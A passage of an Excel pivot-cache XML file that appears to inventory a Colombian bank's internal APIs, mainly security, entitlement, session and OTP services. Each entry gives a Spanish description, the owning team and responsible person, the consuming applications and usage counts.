    <n v="202"/>
    <s v="Security - OAuth Provider from OTP Pymes"/>
    <n v="101"/>
    <s v="oauth-otp-pymes"/>
    <s v="Proveedor de OAuth2 para autenticación con One Time Password (OTP) para Pymes"/>
    <s v="DESARROLLO_DE_SERVICIOS_E_INTEGRACION"/>
    <s v="SOA y APIs"/>
    <s v="Servicios e Integració​​​​​​​​​​​​​​n"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="WorldRemit_WRT _x000d__x000a_ BC_Herramientas_MonitoreoPrd _x000d__x000a_ Carventuri _x000d__x000a_ Uniteller_UTL _x000d__x000a_ BCHerramientasMonitoreo_AAA _x000d__x000a_ WOMPI _x000d__x000a_ TIGOUNE _x000d__x000a_ Tuya _x000d__x000a_ VIRGINMOBILEAPP _x000d__x000a_ SmallWorld_OMX _x000d__x000a_ Baguer SAS _x000d__x000a_ SERVICIOS DE SALUD IPS SURAMERICANA S.A.S. _x000d__x000a_ OPERACIONES GENERALES SURAMERICANA SAS _x000d__x000a_ SERVICIOS GENERALES SURAMERICANA S.A.S. _x000d__x000a_ CONSULTORIA EN GESTION DE RIESGOS SURAMERICANA _x000d__x000a_ SEGUROS GENERALES SURAMERICANA SA _x000d__x000a_ SEGUROS DE VIDA SURAMERICANA SA _x000d__x000a_ EPS SURAMERICANA S.A. _x000d__x000a_ FONYOU COLOMBIA SAS _x000d__x000a_ INVERSORA EBCO APP _x000d__x000a_ ABC PAGOS _x000d__x000a_ LYRAAPP _x000d__x000a_ CLAROAPP _x000d__x000a_ SUPERPAGOSAPP _x000d__x000a_ ZONA PAGOS _x000d__x000a_ Place to Pay _x000d__x000a_ T atiendo Boton Bancolombia _x000d__x000a_ Boton Bancolombia _x000d__x000a_ E-collect _x000d__x000a_ App_Blendex_BotonBancolombia _x000d__x000a_ ofrendaappbc _x000d__x000a_ ALKOSTO BOTON BANCOLOMBIA _x000d__x000a_ WOMPI APP _x000d__x000a_ COMFAMA APP _x000d__x000a_ SISTECREDITO SAS _x000d__x000a_ PAYMENTEZ APP _x000d__x000a_ FONVALMED"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-05-24T14:53:11"/>
    <s v="Security Access Entitlement"/>
    <n v="100"/>
    <s v="Security Access Entitlement - Memberships"/>
    <n v="100"/>
    <s v="security-access-entitlement-memberships"/>
    <s v="Esta API permite validar y regenerar el código íºnico de afiliación; este código está relacionado al documento del usuario delegado que se está creando y el cliente. Hace parte del proceso de delegación de acceso a los contenidos y/o funcionalidades de los canales Bancolombia y debe ser exitoso para que se efectíºe la delegación."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <s v="Autenticación y Monitoreo"/>
    <s v="Productor"/>
    <s v="Autorizaciones"/>
    <s v="Daniel Esteban Ramirez Correa"/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-05-24T14:53:11"/>
    <s v="Security Access Entitlement"/>
    <n v="100"/>
    <s v="Security Access Entitlement - Relations"/>
    <n v="100"/>
    <s v="security-access-entitlement-relations"/>
    <s v="Esta API permite la consulta de la relación que tiene un cliente de los segmentos personas o empresas con las siguientes caracterí­sticas: Si está actuando bajo nombre propio, si es una persona natural, si es una persona jurí­dica. Validando así­ las delegaciones que tenga un titular a un usuario delegado.  De tal forma que permite decidir si la persona, tiene permiso para acceder a productos propios o delegados por terceros, bajo un nivel de privilegios asignados a un rol."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <s v="Autenticación y Monitoreo"/>
    <s v="Productor"/>
    <s v="Autorizaciones"/>
    <s v="Daniel Esteban Ramirez Correa"/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-10-05T10:01:03"/>
    <s v="Security Access Entitlement Delegates"/>
    <n v="100"/>
    <s v="Security Access Entitlement Delegates - Information"/>
    <n v="100"/>
    <s v="security-access-entitlement-delegates-information"/>
    <s v="Esta API permite la consulta de un usuario delegado. indicando su identidad, rol, privilegios asignados, grupo de productos asociados, recursos asignados y el estado. De tal forma que permite validar si la persona, tiene permiso para acceder a productos no propios otorgados por el dueí±o del producto o representante legal."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <s v="Autenticación y Monitoreo"/>
    <s v="Productor"/>
    <s v="Autorizaciones"/>
    <s v="Daniel Esteban Ramirez Correa"/>
    <m/>
    <m/>
    <s v="Entitlement_NU0141001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-10-05T10:01:03"/>
    <s v="Security Access Entitlement Delegates"/>
    <n v="100"/>
    <s v="Security Access Entitlement Delegates - Management"/>
    <n v="100"/>
    <s v="security-access-entitlement-delegates-management"/>
    <s v="Esta API permite la gestión de un usuario delegado persona natural y persona jurí­dica.Se tiene una operación de crear la relación de un usuario delegado con un cliente persona natural y la relación de un usuario delegado con un cliente persona jurí­dica.La capacidad de eliminar es transversal para las relaciones de delegado con un cliente persona natural y la relación de un usuario delegado con un cliente persona jurí­dica."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <s v="Autenticación y Monitoreo"/>
    <s v="Productor"/>
    <s v="Autorizaciones"/>
    <s v="Daniel Esteban Ramirez Correa"/>
    <m/>
    <m/>
    <s v="Entitlement_NU0141001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-10-05T09:54:26"/>
    <s v="Security Access Entitlement Owners"/>
    <n v="100"/>
    <s v="Security Access Entitlement Owners - Information"/>
    <n v="100"/>
    <s v="security-access-entitlement-owners-information"/>
    <s v="Esta API permite la consulta de un usuario titular persona natural y persona jurí­dica. indicando su identidad, rol, privilegios asignados, grupo de productos asociados, recursos asignados y el estado. De tal forma que permite validar si la persona, tiene permiso para acceder a productos propios 'como dueí±o del producto o representante legal."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <s v="Autenticación y Monitoreo"/>
    <s v="Productor"/>
    <s v="Autorizaciones"/>
    <s v="Daniel Esteban Ramirez Correa"/>
    <m/>
    <m/>
    <s v="Entitlement_NU0141001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-10-05T09:54:26"/>
    <s v="Security Access Entitlement Owners"/>
    <n v="100"/>
    <s v="Security Access Entitlement Owners - Management"/>
    <n v="100"/>
    <s v="security-access-entitlement-owners-management"/>
    <s v="Esta API permite la gestión de un usuario titular persona natural y persona jurí­dica. Se tienen dos operaciones de crear la relación de un usuario titular con un cliente persona natural y la relación de un usuario titular con un cliente persona jurí­dica.La capacidad de eliminar es transversal para las relaciones de titular con un cliente persona natural y la relación de un usuario titular con un cliente persona jurí­dica."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <s v="Autenticación y Monitoreo"/>
    <s v="Productor"/>
    <s v="Autorizaciones"/>
    <s v="Daniel Esteban Ramirez Correa"/>
    <m/>
    <m/>
    <s v="Entitlement_NU0141001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2022-03-29T14:55:26"/>
    <s v="Security Access Entitlement Privileges"/>
    <n v="100"/>
    <s v="Security Access Entitlement Privileges - Information"/>
    <n v="100"/>
    <s v="security-access-entitlement-privileges-information"/>
    <s v="El API Security Access Entitlement - Information permite consultar los privilegios disponibles que tiene un usuario con el fin de gestionar sus relaciones en Entitlement."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <s v="Autenticación y Monitoreo"/>
    <s v="Productor"/>
    <s v="Autorizaciones"/>
    <s v="Daniel Esteban Ramirez Correa"/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2022-06-09T21:35:07"/>
    <s v="Security Access Entitlement Schemes"/>
    <n v="100"/>
    <s v="Security Access Entitlement Schemes - Information"/>
    <n v="100"/>
    <s v="security-access-entitlement-schemes-information"/>
    <s v="El Api permite consultar los esquemas de un cliente asociados a Entitlement, se tienen los siguientes esquemas Administración íºnica: Ejecutor directo es el equema que permite tener un usuario super poderoso, para usar este se requiere  un usuario al cual se le debe asignar el rol titular. Administración míºltiple: Control Dual es el equema que permite tener dos usuarios depedientes uno del otro, para usar este esquema se requieren 2 usuarios a los cuales se le debe asignar el rol titular. titularAdministración míºltiple x2:  Control dual X 2 es el equema que permite tener 4 usuarios, divididos en dos grupos monetario y no monetario, para usar este esquema se requieren 4 usuarios, 2 de ellos con rol titular monetario y los otros 2 con rol titular no monetario.Administración míºltiple x3:  Control dual X 3 es el esquema que permite tener 6 usuarios, divididos en tres grupos monetario, no monetario y administrativo, para usar este esquema se requieren 6 usuarios, 2 de ellos con rol titular monetario , los otros 2 con rol titular no monetario y los ultimos 2 titular administrativo"/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <s v="Autenticación y Monitoreo"/>
    <s v="Productor"/>
    <s v="Autorizaciones"/>
    <s v="Daniel Esteban Ramirez Correa"/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2022-04-20T14:40:19"/>
    <s v="Security Alphanumeric"/>
    <n v="101"/>
    <s v="Security Alphanumeric - Passwords Management"/>
    <n v="101"/>
    <s v="security-alphanumeric-passwords-management"/>
    <s v="Esta API permite gestionar la creación, validación y cambio de clave alfanumérica que está asociada al alias de un usuario para el ingreso desde un canal consumidor. La clave alfanumérica debe tener como mí­nimo 8 caracteres otorgando así­ una mayor seguridad al ingreso de cualquier canal, generando un control más disuasivo para intentos de adivinación, reduciendo el níºmero de clientes suplantados por adivinación acogiéndose a los estándares de la industria para la autenticación."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <s v="Autenticación y Monitoreo"/>
    <s v="Productor"/>
    <s v="Gestión de Identidades"/>
    <s v="Mariluz Velasquez Suarez"/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-10-06T15:41:16"/>
    <s v="Security Application"/>
    <n v="110"/>
    <s v="Security Application - Event Records"/>
    <n v="110"/>
    <s v="security-application-event-records"/>
    <s v="Esta API permite la consulta de los eventos funcionales de las aplicaciones del ecosistema de seguridad, de forma de que el manejo de estos eventos sea estándar obteniendo la información sobre los sucesos en cada una de las aplicaciones.  Ofrece la capacidad de realizar la consulta por procesos, acciones, aplicaciones o actores que generaron registros en las aplicaciones."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <s v="Autenticación y Monitoreo"/>
    <s v="Productor"/>
    <s v="Monitoreo y Transversales"/>
    <s v="Hair Alexander Morales"/>
    <m/>
    <m/>
    <s v="MascaraTransaccional_NU0021001"/>
    <m/>
    <m/>
    <m/>
    <n v="4"/>
    <n v="10"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2022-05-03T15:24:44"/>
    <s v="Security Channel"/>
    <n v="101"/>
    <s v="Security Channel - Authentication Credentials"/>
    <n v="101"/>
    <s v="security-channel-authentication-credentials"/>
    <s v="Esta API permite una autenticación de credenciales la cual retorna un token JWT que contiene la información del cliente, íºltima fecha y hora de acceso y token de sesión, para que los consumidores puedan tranzar en los diferentes aplicativos del banco. Se puede generar usando las credenciales cifradas del cliente, es decir, cuando el Cliente se autentica."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <s v="Autenticación y Monitoreo"/>
    <s v="Productor"/>
    <s v="Gestión de Identidades"/>
    <s v="Mariluz Velasquez Suarez"/>
    <m/>
    <m/>
    <s v="APP-PERSONAS_NU0146001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2022-03-25T17:54:35"/>
    <s v="Security Code"/>
    <n v="100"/>
    <s v="Security Code - Management"/>
    <n v="100"/>
    <s v="security-code-management"/>
    <s v="Esta API ofrece las capacidades que permiten realizar la generacion de un codigo de seguridad y la validacion de este mismo."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <s v="Autenticación y Monitoreo"/>
    <s v="Productor"/>
    <s v="Gestión de Identidades"/>
    <s v="Mariluz Velasquez Suarez"/>
    <m/>
    <m/>
    <s v="AW133302_securityCode _x000d__x000a_ BNPL_NU0287001"/>
    <m/>
    <n v="17"/>
    <m/>
    <n v="7"/>
    <n v="1"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2022-07-27T20:41:55"/>
    <s v="Security Code"/>
    <n v="200"/>
    <s v="Security Code - Management"/>
    <n v="200"/>
    <s v="security-code-management"/>
    <s v="Esta API ofrece las capacidades que permiten realizar la generacion de un codigo de seguridad y la validacion de este mismo."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <s v="Autenticación y Monitoreo"/>
    <s v="Productor"/>
    <s v="Gestión de Identidades"/>
    <s v="Mariluz Velasquez Suarez"/>
    <m/>
    <m/>
    <s v="Management_AW1333002"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <n v="1"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-04-08T15:41:35"/>
    <s v="Security Contacts"/>
    <n v="112"/>
    <s v="Security Contacts - Information"/>
    <n v="102"/>
    <s v="security-contacts-information"/>
    <s v="El api de 'Security Contacts - Information'? es la capacidad que se ofrece a los clientes Bancolombia, para obtener la información relacionada de los clientes con personas de su entera confianza que puedan autenticar por medio de un código enviado la información de un cliente. Los escenarios de uso de la capacidad son referentes a confirmaciones que tendrá que realizar un cliente cuando requiera realizar algíºn proceso que tenga este flujo de contactos establecido. Vinculación de un contacto, desbloqueo de la clave dinámica, confirmación para modificar información entre otras.  El api de Security Contacts - Information contará la capacidad de consultar los contactos de ayuda asociados a un cliente por medio de la operación Listar contactos."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <s v="Autenticación y Monitoreo"/>
    <s v="Productor"/>
    <s v="Autorizaciones"/>
    <s v="Daniel Esteban Ramirez Correa"/>
    <m/>
    <m/>
    <s v="MascaraTransaccional_NU0021001 _x000d__x000a_ ALM_AW0955001"/>
    <n v="28"/>
    <n v="6"/>
    <n v="12"/>
    <n v="26"/>
    <n v="1738"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-11-22T09:22:38"/>
    <s v="Security Contacts"/>
    <n v="112"/>
    <s v="Security Contacts - Management"/>
    <n v="112"/>
    <s v="security-contacts-management"/>
    <s v="El api de Security Contacts - Management es la capacidad que se ofrece a los clientes Bancolombia, para administrar y gestionar los contactos de ayuda de un cliente, que son personas de su entera confianza que puedan autenticar por medio de un código enviado la información del mismo. Los escenarios de uso de la capacidad son referentes a confirmaciones que tendrá que realizar un cliente cuando requiera realizar algíºn proceso que tenga este flujo de contactos establecido. Vinculación de un contacto, desbloqueo de la clave dinámica, confirmación para modificar información entre otras."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <s v="Autenticación y Monitoreo"/>
    <s v="Productor"/>
    <s v="Autorizaciones"/>
    <s v="Daniel Esteban Ramirez Correa"/>
    <m/>
    <m/>
    <s v="MascaraTransaccional_NU0021001 _x000d__x000a_ ALM_AW0955001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <n v="153"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-04-08T15:41:35"/>
    <s v="Security Contacts"/>
    <n v="112"/>
    <s v="Security Contacts - OTP"/>
    <n v="102"/>
    <s v="security-contacts-otp"/>
    <s v="El Api de Security Contacts - OTP es la capacidad que se ofrece a los clientes Bancolombia, para validar temas referentes a acciones dentro de los canales banco por medio de personas de su entera confianza que han sido previamente vinculadas para que  puedan autenticar por medio de un código enviado la información de un cliente."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <s v="Autenticación y Monitoreo"/>
    <s v="Productor"/>
    <s v="Autorizaciones"/>
    <s v="Daniel Esteban Ramirez Correa"/>
    <m/>
    <m/>
    <s v="MascaraTransaccional_NU0021001 _x000d__x000a_ ALM_AW0955001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-05-26T09:14:43"/>
    <s v="Security Session Id"/>
    <n v="205"/>
    <s v="Security Session Id - OAuth"/>
    <n v="204"/>
    <s v="security-session-id-oauth"/>
    <s v="Api que permite cambiar el Id de sesión para canales virtuales por un token de acceso"/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <s v="DATOS, ANALÍTICA, IA, BLOCKCHAIN"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco "/>
    <s v="ConsultaDatosTributariosCliente/V1.0"/>
    <s v="MDM"/>
    <s v="EASYHOME_NU0004001 _x000d__x000a_ SVP_NU0004001 _x000d__x000a_ MovilidadCore_AW1281002 _x000d__x000a_ PortalConstructor_AW0360004 _x000d__x000a_ FUA_AW1291001 _x000d__x000a_ HabitatCore_AW1281003 _x000d__x000a_ PEP_AW1281002 _x000d__x000a_ HDC_AW0453001 _x000d__x000a_ SVETDL_AW0360006 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ AW1312001_SVS_ENROLAMIENTO _x000d__x000a_ Networking_NU0046001 _x000d__x000a_ CGC_NU0014001 _x000d__x000a_ VINCUTRANS_NU0034001 _x000d__x000a_ AdaptadorMarketplace_NU0143001 _x000d__x000a_ NETWORKING_NU0046001 _x000d__x000a_ CryptoAssetsGMN_NU0094001 _x000d__x000a_ MigracionFUA_AW1291001 _x000d__x000a_ LoansOffer_NU0102001 _x000d__x000a_ SVECarteraComercial_NU0162001 _x000d__x000a_ Transversal_AW0937001 _x000d__x000a_ BancolombiaPay_AW1435001"/>
    <n v="319853"/>
    <n v="1060325"/>
    <n v="690881"/>
    <n v="1431176"/>
    <n v="1574453"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-05-26T09:14:43"/>
    <s v="Security Session Id"/>
    <n v="300"/>
    <s v="Security Session Id - OAuth"/>
    <n v="300"/>
    <s v="security-session-id-oauth"/>
    <s v="Api que permite cambiar el Id de sesión para canales virtuales por un token de acceso"/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <s v="DATOS, ANALÍTICA, IA, BLOCKCHAIN"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco "/>
    <s v="ConsultaDatosTributariosCliente/V1.0"/>
    <s v="MDM"/>
    <s v="PEP_AW1281002 _x000d__x000a_ CryptoAssetsGMN_NU0094001 _x000d__x000a_ AdaptadorMarketplace_NU0143001 _x000d__x000a_ Marketplacetu360HM_NU0035001 _x000d__x000a_ SVECarteraComercial_NU0162001 _x000d__x000a_ HDC_AW0453001 _x000d__x000a_ EASYHOME_NU0004001 _x000d__x000a_ BNPL_NU0287001 _x000d__x000a_ HabitatCore_AW1281003 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ BancolombiaPay_AW1435001 _x000d__x000a_ CGC_NU0014001 _x000d__x000a_ ModuloSVELeasing_AW0360006"/>
    <n v="319853"/>
    <n v="1060325"/>
    <n v="690881"/>
    <n v="1431176"/>
    <n v="1574453"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-10-25T16:47:43"/>
    <s v="Security Session Management"/>
    <n v="100"/>
    <s v="Security Session Management - Session Management"/>
    <n v="100"/>
    <s v="security-session-management"/>
    <s v="Esta API permite conocer si la identidad digital de un usuario se encuentra registrada y activa."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <s v="Autenticación y Monitoreo"/>
    <s v="Productor"/>
    <s v="Gestión de Identidades"/>
    <s v="Mariluz Velasquez Suarez"/>
    <m/>
    <m/>
    <s v="MigracionFUA_AW1291001 _x000d__x000a_ PortalAutogestionPyme_AW1287 _x000d__x000a_ SVSENROLAMIENTO_AW1312001 _x000d__x000a_ SVSENROLAMIENTO_AW1312001 _x000d__x000a_ AdaptadorMarketplace_NU0143001 _x000d__x000a_ HDC_AW0453001 _x000d__x000a_ Transversal_AW0937001 _x000d__x000a_ PEP_AW1281002 _x000d__x000a_ ModuloNegociosFiduciarios_NU0247001"/>
    <m/>
    <m/>
    <n v="2"/>
    <n v="753"/>
    <n v="2127812"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2022-06-02T11:17:46"/>
    <s v="Security Session Management"/>
    <n v="100"/>
    <s v="Security Session Management - Session Management"/>
    <n v="100"/>
    <s v="security-session-management"/>
    <s v="Esta API permite conocer si la identidad digital de un usuario se encuentra registrada y activa."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <s v="Autenticación y Monitoreo"/>
    <s v="Productor"/>
    <s v="Gestión de Identidades"/>
    <s v="Mariluz Velasquez Suarez"/>
    <m/>
    <m/>
    <s v="MarketplaceEcosistemasPersonas_NU0035001"/>
    <m/>
    <m/>
    <n v="2"/>
    <n v="753"/>
    <n v="2127812"/>
    <x v="4"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2020-09-05T12:19:33"/>
    <s v="Security Simple Authentication"/>
    <n v="110"/>
    <s v="Security Simple Authentication - OAuth"/>
    <n v="110"/>
    <s v="security-simple-authentication-oauth"/>
    <s v="Api que permite cambiar el Id de sesión para canales virtuales por un token de acceso"/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <s v="DATOS, ANALÍTICA, IA, BLOCKCHAIN"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco "/>
    <s v="ConsultaDatosComplementariosCliente/V1.0"/>
    <m/>
    <s v="FUA_AW1291001 _x000d__x000a_ PEP_AW1281002 _x000d__x000a_ EDIN_AW1185001 _x000d__x000a_ MigracionFUA_AW1291001"/>
    <m/>
    <m/>
    <n v="63"/>
    <n v="309"/>
    <n v="352"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2020-09-05T12:19:33"/>
    <s v="Security Simple Authentication"/>
    <n v="200"/>
    <s v="Security Simple Authentication - OAuth"/>
    <n v="200"/>
    <s v="security-simple-authentication-oauth"/>
    <s v="Api que permite cambiar el Id de sesión para canales virtuales por un token de acceso"/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <s v="DATOS, ANALÍTICA, IA, BLOCKCHAIN"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco "/>
    <s v="ConsultaDatosComplementariosCliente/V1.0"/>
    <m/>
    <s v="PEP_AW1281002 _x000d__x000a_ EDIN_AW1185001"/>
    <m/>
    <m/>
    <n v="63"/>
    <n v="309"/>
    <n v="352"/>
    <x v="1"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Seguimiento Solicitudes Cliente"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Este servicio tiene la capacidad de permitir a las diferentes áreas del banco registrar las novedades de una solicitud y poder consultar el estado de la solicitud."/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <s v="Conocimiento de clientes"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <s v="Esteban Arroyave Montoya"/>
    <m/>
    <m/>
    <s v="AW0611001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Seguridad Informacion Tarjetas"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio de seguridad información tarjetas, permite consultar la información sensible de las tarjetas de crédito, débito y e-prepago."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Servicios Transaccionales MP"/>
    <s v="Medios de pago Aceptacion"/>
    <s v="Productor"/>
    <s v="Servicios Transaccionales MP"/>
    <s v="Alfredo Alonso Parra Laverde"/>
    <m/>
    <s v="Modulo de Administracion de Tarjetas (MAT)_MAT_ISMAT0003"/>
    <s v="AW1189001 _x000d__x000a_NU0019001 _x000d__x000a_NU0103001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Seguro De Retiro En Cajero"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Esta versión permite a los consumidores la opción de asegurar un retiro de dinero en cajeros como el electrónico, adicionalmente permite conocer la información de los retiros que han sido asegurados. "/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <s v="Seguros"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="NU0021001 _x000d__x000a_DEVELOPSOATEST _x000d__x000a_AW1151001 _x000d__x000a_NU0084001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-08-12T17:09:30"/>
    <s v="Customer Investment Authentication"/>
    <n v="102"/>
    <s v="Session Token - Management"/>
    <n v="102"/>
    <s v="customer-investment-authentication-session-token-management"/>
    <s v="Permite la creación y validación de token de sesión para un cliente en especí­fico en Valores Bancolombia."/>
    <s v="NEGOCIOS_DE_INVERSION"/>
    <s v="Valores"/>
    <s v="Inversiones"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <s v=""/>
    <m/>
    <s v="AsesoriaAsistida_AW1208 _x000d__x000a_ Inversi_NU0160001 _x000d__x000a_ MonitoreoDCM_NU0084001"/>
    <n v="2558"/>
    <n v="2634"/>
    <n v="1930"/>
    <n v="2011"/>
    <n v="2027"/>
    <x v="1"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2020-09-08T08:40:41"/>
    <s v="Loans Sufi"/>
    <n v="100"/>
    <s v="Simulation"/>
    <n v="100"/>
    <s v="simulation"/>
    <s v="El API Simulación del Crédito? se encarga de recibir los datos básicos, valores y plazo de un posible crédito, para proceder a generar una simulación y responder con los resultados de cuotas y demás datos de pagos que el cliente asumirá, para que con dicha información pueda tomar la decisión de iniciar la radicación del estudio de crédito. Esta API será genérica para cualquier producto o lí­nea de negocio en SUFI."/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <s v="SUFI"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <m/>
    <s v="MarketplaceEcosistemasPersonas_NU0035001 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="39841"/>
    <n v="20880"/>
    <n v="342"/>
    <n v="594"/>
    <n v="645"/>
    <x v="3"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Sincronizacion Estados PQRS"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio permite reportar el estado de los PQR de queja o reclamos de origen banco o de la superfinanciera"/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <s v="Conocimiento de clientes"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <s v="Tatiana Andrea Cardenas"/>
    <m/>
    <m/>
    <s v="AW0611001 _x000d__x000a_AW611001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2020-10-15T16:52:57"/>
    <s v="SME Credit Cards"/>
    <n v="101"/>
    <s v="SME Credit Cards - cards information"/>
    <n v="101"/>
    <s v="sme-credit-cards-cards-information"/>
    <s v="El API  permite consultar la información de tarjetas de crédito para PYME. Permite listar las tarjetas PYME de un cliente o consultar los saldos consolidados de las tarjetas asociadas a un cliente PYME."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Emisor"/>
